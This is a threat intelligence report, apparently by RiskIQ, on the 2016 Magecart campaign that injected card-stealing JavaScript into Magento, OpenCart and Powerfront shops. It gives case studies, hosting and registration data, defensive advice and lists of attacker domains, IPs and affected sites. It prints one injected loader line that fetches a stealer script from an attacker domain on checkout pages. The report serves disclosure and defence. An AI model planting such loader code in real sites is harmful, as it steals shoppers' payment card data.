WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
Compromised e commerce_sites_lead_to_web-based_keyloggers
1. RiskIQ Research: Compromised eCommerce Sites Lead to Web-Based Keyloggers
Most methods used by attackers to target consumers are commonplace, such as phishing and
the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend
to be rarer and isolated to certain industries. However, some methods are downright
obscure—a recently observed instance of threat actors injecting a keylogger directly into a
website is one of these.
Targeting Consumers Via Retailer Payment Platforms
Since the widely publicized breach of Target Corporation, there has been a significant increase
in awareness of activity surrounding POS (point of sale) system breaches. But web-based
keylogger injection incidents continue to be little-known, even though they've been occurring for
even longer than threats related to many high-profile breaches.
In 2000, the discovery of a vulnerability in versions of the widely-deployed Cart32 software,
which enables consumers to shop online, gave threat actors access to the application as the
administrator so they could dump credit card data and run commands on the hosting server. In
2007, discussions like this in the OSCommerce community illustrated more instances. Later in
2011, analysis showed additional mass compromise activity in OSCommerce pushing online
store visitors to information-stealing malware.
Since then, this kind of activity increased, affecting other popular shopping cart software
implementations.
● https://www.atwix.com/magento/credit-card-numbers-leak/
● http://www.snapfast.com/blog/magento-mage-jpg-hack/
● https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.ht
ml
● https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
● https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html
2016 Magecart injections
In 2016, the trend continues. Numerous hacked eCommerce websites appear to be affected by
a new compromise that injects JavaScript code into the site, which allows attackers to capture
payment card information. RiskIQ has observed this campaign ranging back to at least March
2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects
of the activity was shared in June by Sucuri.
2. RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes.
Through analysis of data in RiskIQ Security Intelligence Services and RiskIQ’s PassiveTotal,
we’ve discovered that, although somewhat similar to other active credit card stealer operations,
Magecart is significant for a few reasons.
1. Affected sites are hosted on multiple eCommerce platforms. At least the following
technologies are explicitly seen to be impacted by this activity:
● Magento Commerce
● Powerfront CMS
● OpenCart
2. Multiple payment services provider linkages are targeted on affected sites as well, including:
● Braintree
● VeriSign payment processing
3. Formgrabber/credit card stealer content is hosted on remote attacker-operated sites, served
over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS.
4. Attackers have refined their malicious content over time, with identified samples in RiskIQ
data showing evidence of:
● Testing and capabilities development
● Increased scope of targeting payment platforms
● Development and testing of enhancements
● Addition of obfuscation to hinder analysis and identification
● Attempts to hide behind brands of commonplace web technologies to blend in on
compromised sites
5. The credit card stealer works in a very similar manner on the compromised web server as a
banking trojan functions on a compromised victim workstation. Code is injected which can
“hook” web forms and access data form submissions much like a formgrabber. Data is
exfiltrated from the compromised server to a dropzone for attacker collection. There is also
some indication in related payloads that attackers may be injecting bogus form fields into
payment forms to solicit additional data from victims, similar to how webinjects operate when
logged into a banking website from a compromised endpoint.
Further insight on the functionality of the stealers observed in this campaign is available from
ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this
threat activity.
An approximate timeline in observations from analyzed data provides the following insight:
3. 1. March 2016: The domain statsdot.eu was registered, indicating possible early stages of
the immediate Magecart campaign. Injections were simplistic and payloads were largely
unobfuscated.
2. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of
obfuscation. Unusual two-stage form of payload delivery observed (two domains used to
serve injection to site visitors). The addition of conditional activation of stealer scripts by
targeted cart URLs (checkout pages, etc.) were observed.
3. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to
AS203624 DATAFLOWSU, a recognized Eastern European “bulletproof hoster” (hosting
and network services provider operated by and catering to cybercriminal interests).
4. September 2016: Additional obfuscated script injections and remotely hosted JS were
observed. At this time, activity is reduced but steady.
How Magecart Works
With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page
contents—including the Document Object Model (DOM), we can illustrate the operation of this
campaign. The following sections present incidents on some affected websites.
www.faber.co.uk
In May 2016, RiskIQ observed the website of Faber and Faber, famed UK book publishing
house, to be serving Magecart injections from their Magento site.
4. The injection in the source of the site can be seen with a simple addition of a script tag. When
the injected web page on the merchant site is loaded, the malicious keylogger script is also
loaded in the background. The keylogger script can access the browser session and submitted
data.
5. In this case, the attacker delivers the malicious credit card stealer script in two stages:
1. The injected URL verifies that the page the site visitor is on is a checkout URL where
cardholder data will be entered. In the delivered code, it is visible, for example, that the
Firecheckout extension for Magento is targeted.
2. If the test succeeds, the stealer script is loaded from the second stage script URL:
if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};
The resulting stealer script as served in this incident is shown below:
The basic functionality of this script is to capture data from form fields and send the data to the
remote URL using an AJAX call.
Looking into the hosting for this attacker infrastructure, we see the following components active
at the time:
mageonline.net 108.61.188.71
jquery-cdn.top 45.32.153.108
45.32.153.108 AS20473 | US | AS-CHOOPA - Choopa LLC
108.61.188.71 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
6. Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant
name and email):
JQUERY-CDN.TOP 2016-05-09 PDR Ltd bitcoin-dns.hosting Ted 31338@mail.ru
MAGEONLINE.NET 2016-05-16 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
bitcoin-dns.hosting Gregory braun.security@yandex.com
Note
The domain jquery-cdn.top may sound familiar to readers. In 2014 a threat actor
group used the domain jquery-cdn.com in a series of attacks against web sites,
injecting malicious redirects into them to hijack visitor traffic to push victims to an
instance of a crimeware exploit kit.
https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise-
it-accounts-at-risk/
This was a different attack campaign with different goals but illustrates a common
technique in website hijacking where domain names and similar indicators are chosen
with careful intent to allow attacker modifications and network traffic to blend in and
avoid suspicion by onlookers. The names of popular JavaScript libraries is a common
choice because of their presence on so many websites. A listing of Magecart domains
and sampling of URLs is presented at the end of this report to illustrate how this
concept influenced this attacker’s choice of naming their infrastructure.
A short time later in the month, RiskIQ observed the attack site serving slightly modified
payloads:
7. We believe this modification indicates work in progress on developing and enhancing the
attacker’s code. You can see that commented sections were added to the file referencing form
fields related to Braintree’s Magento module. Braintree is a payment processing service that
may be snapped into the Magento platform to facilitate payment handling. The addition of this
code may be an indication of development and expansion of cardholder data targeting by the
attacker.
We also note that the bottom of the file also contains a call to console.log(), which aids the site
visitor in debugging elements on the page. Verifying the victim eCommerce site, in this case, we
note that the site indeed included Braintree-related JavaScript libraries. Opportunistic attackers
may not always be able to predict the internals of how a compromised website handles details
like payment processing and credit card handling. However, it's likely that upon access to
multiple victim websites, threat actors realized they needed to add additional support for the
variety of services used in the eCommerce space, leading to this on-the-fly development.
www.everlast.com
Later in May, we identified that the main site of clothing/fitness powerhouse Everlast
Worldwide, Inc. was compromised and abused to steal credit card data by the same threat
actors.
8. As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer
script used the filename everlast.js., which may indicate that the attackers recognized a major
brand at their disposal and took additional steps to attempt to have their malicious code blend in
with site contents. This customization of script names to match victim sites is not common
across much of the analyzed activity.
9. Like that observed in other reported activity, the stealer code served in this instance is delivered
in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer and we
note that it is used various capacities by multiple threat actors (observed in malicious website
code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script
library is shown below:
Resolution and domain data in this occurrence:
angular.club 108.61.211.216
108.61.211.216 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
ANGULAR.CLUB 2016-05-15 PDR Ltd. d/b/a PublicDomainRegistry.com bitcoin-dns.hosting
Gregory braun.security@yandex.com
shop.guess.net.au
In July, we observed another major fashion/lifecycle brand affected by the Magecart threat. The
GUESS Australia online store was affected, and notably not implemented on Magento but
rather Powerfront CMS.
10. As shown, the attacker appears to have adapted the name of the stealer script (/mage-asp.js)
to, in part, reflect the technology on the underlying site—Powerfront CMS is implemented in
ASP.
Stealer code:
11. Significant in this case is that sometime before staging this attack, hosting for the malicious
stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat
activity and noted to be a bulletproof hosting provider, servicing criminal customers on a
dedicated basis.
mage-js.link 80.87.205.143
80.87.205.143 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
MAGE-JS.LINK 2016-06-09 Gandi SAS gandi.net Farid Zeynalov abuse@dataflow.su
www.rebeccaminkoff.com
More recently, on September 19, RiskIQ observed the Magento online store of fashion brand
Rebecca Minkoff (apparel, handbags, more) affected by Magecart.
13. 80.87.205.145 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
JS-SYST.SU 2016-08-25 REGRU-REG-FID reg.ru - rudneva-y@mail.ua
RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel
category, believed to be in part because of the popularity of eCommerce in this space to extend
storefronts to the Internet.
Conclusion and Guidance
As attackers focus on broadening capabilities to seize revenue opportunities, targets of
cybercrime face an array of threats. eCommerce site owners must take every step necessary to
secure their data and safeguard their payment card information. A bad experience at a retailer
site may mean the loss of revenue as impacted users take their money elsewhere. Because
Magecart affects websites deployed on commodity CMS and eCommerce software technology,
the implementations of which may be outsourced by merchants to third parties, both merchants
and integrators must take active roles in ensuring secure environments for deployed sites. Here
is RiskIQ’s guidance:
● Merchants should partner with integrators and contractors who can be verified to provide
assurances not only of minimum compliance requirements but can also demonstrate
transparency around the technologies they utilize and their processes for hardening
eCommerce installations and maintaining sound security postures. It is important that
merchants do not leave assurance of this as an assumption! Consider specific contract
language focused on these key elements together with SLAs.
● eCommerce site administrators must ensure familiarity and conformance to
recommended security controls and best practices related to eCommerce, and
particularly, the software packages utilized. All operating system software and web stack
software must be kept up to date. It is critical to remain abreast of security advisories
from the software developers and to ensure that appropriate patch application follows,
not only for the core package but also third-party plugins and related components.
Examples of such resources for the Magento CMS include the following:
○ https://magento.com/security
○ https://magento.com/security/best-practices
● Site and system administrators should safeguard credentials used to access admin
interfaces and underlying web hosting environments and passwords should be changed
regularly. Strong authentication schemes should be utilized where available to reduce
the risk from stolen credentials. Multi-factor authentication or two-step verification
options are commonplace and effective for this. Use of cryptographic keys and
14. authentication tokens for access to remote hosting servers is recommended over
traditional username and password logins.
End users are also at significant risk as it is their payment data that is on the line when
engaging in online sales. We recommend the following considerations for consumers:
● Carefully consider the online retailers whose sites you visit and to whom you submit
payment data. Understand that at any given time, a portion of online retailers are
compromised and present a risk that’s unknown to site owners. Without a high level of
visibility and knowledge about attack techniques, it may be difficult to discern high-risk
sites. Attempt to do business with merchants you believe are trustworthy and go to great
lengths to protect customer data.
● Maintain secure configurations on all computers used to carry out online purchases. Any
system used for online banking or eCommerce must be a known good or trusted
endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual
machines. Public systems and kiosks should be avoided! Operating system and all
application security updates should be up to date. Other security controls may be utilized
to address specific risks, such as antivirus software or other endpoint solutions.
● An effective control that can prevent attacks such as Magecart is the use of web content
whitelisting plugins such as NoScript (for Mozilla’s Firefox). These types of add-ons
function by allowing the end user to specify which websites are “trusted” and prevents
the execution of scripts and other high-risk web content. Using such a tool, the malicious
sites hosting the credit card stealer scripts would not be loaded by the browser,
preventing the script logic from accessing payment card details.
15. Data and indicators
You can download the indicator files here and here.
Attacker Domains
The following domains are observed serving malicious formgrabber code or are in some way
closely related to observed domains (common hosting or other high-confidence reputational
links). These domains were registered between March and August 2016.
abuse-js.link
angular.club
cdn-js.link
docstart.su
govfree.pw
jquery-cdn.top
js-abuse.link
js-abuse.su
js-cdn.link
js-link.su
js-magic.link
js-mod.su
js-save.link
js-save.su
js-start.su
js-stat.su
js-sucuri.link
js-syst.su
js-top.link
js-top.su
jscript-cdn.com
lolfree.pw
mage-cdn.link
mage-js.link
mage-js.su
magento-cdn.top
mageonline.net
mipss.su
mod-js.su
mod-sj.link
sj-mod.link
sj-syst.link
16. stat-sj.link
statdd.su
statsdot.eu
stecker.su
stek-js.link
syst-sj.link
top-sj.link
truefree.pw
Attacker IP addresses
The following IP addresses are observed hosting formgrabber domains or are in some way
closely related to observed addresses (common hosting or other high-confidence reputational
links). These domains were registered between March and August 2016. These IPs are
provided with associated routing AS data indicating likely provider of hosting or Internet service.
45.32.153.108 AS20473 | US | AS-CHOOPA - Choopa LLC
46.151.52.238 AS203050 | RU | INTESTELLAR - PE Radashevsky Sergiy Oleksandrovich
80.87.205.143 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
80.87.205.145 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
80.87.205.236 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
104.238.177.224 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
108.61.188.71 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
108.61.211.216 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
167.114.35.70 AS16276 | FR | OVH - OVH Hosting Inc.
185.25.51.176 AS61272 | LT | IST - Informacines Sistemos Ir Technologijos UAB
217.12.202.82 AS59729 | BG | ITL - ITL Company
217.12.203.110 AS59729 | BG | ITL - ITL Company
Sample URLs
The following data consists of a set of sample Magecart URLs observed injected into affected
websites, sorted by an observed date of occurrence.
statsdot.eu/mage.js # 2016-05-06
jquery-cdn.top/mage.js # 2016-05-22
jquery-cdn.top/tmp.js # 2016-05-31
mageonline.net/js/mage.js # 2016-05-27
angular.club/js/vanguardgear.js # 2016-05-29
angular.club/js/everlast.js # 2016-05-30
mage-js.link/mage-asp.js # 2016-07-12
cdn-js.link/cdn-js/mage.js # 2016-07-25
statsdot.eu/mag.js # 2016-08-14
17. sj-syst.link/sj-syst/ocart.js # 2016-08-16
js-save.link/js-save/mage.js # 2016-08-18
mage-cdn.link/cp/mage.js # 2016-08-18
mage-cdn.link/mage.js # 2016-08-21
mage-js.link/mage.js # 2016-09-04
jscript-cdn.com/mage.js # 2016-09-16
js-syst.su/mage-script.php # 2016-09-19
Affected websites
The following data provides a list of affected websites observed to be serving script injections to
known Magecart content hosting and data collection hosts over the observed timeframe. This
information is extracted from RiskIQ crawl sequences and presented in the form of host pairs
through PassiveTotal, our solution for investigators and responders exploring the Digital
Footprints of malicious actors.
aufdemkerbholz.de
backstage.gs
eyeglass.com
farmwholesale.com
fidelitystore.com
giftshop.cancerresearchuk.org
gkboptical.com
gypsyville.com
ihomecases.com
kerbholz.com
lenshareca.com
mamapanda.com
mauriziocollectionstore.com
sasshoes.com
saudi.miniexchange.com
shop.air-care.com
shop.guess.net.au
shop2.gzanders.com
shoppu.com.my
storeinfinity.com
truthbookpublishersstore.org
valuedrugs.net
www.5thavenuedog.com
www.aalens.com
www.agssalonequipment.com
www.apacwines.com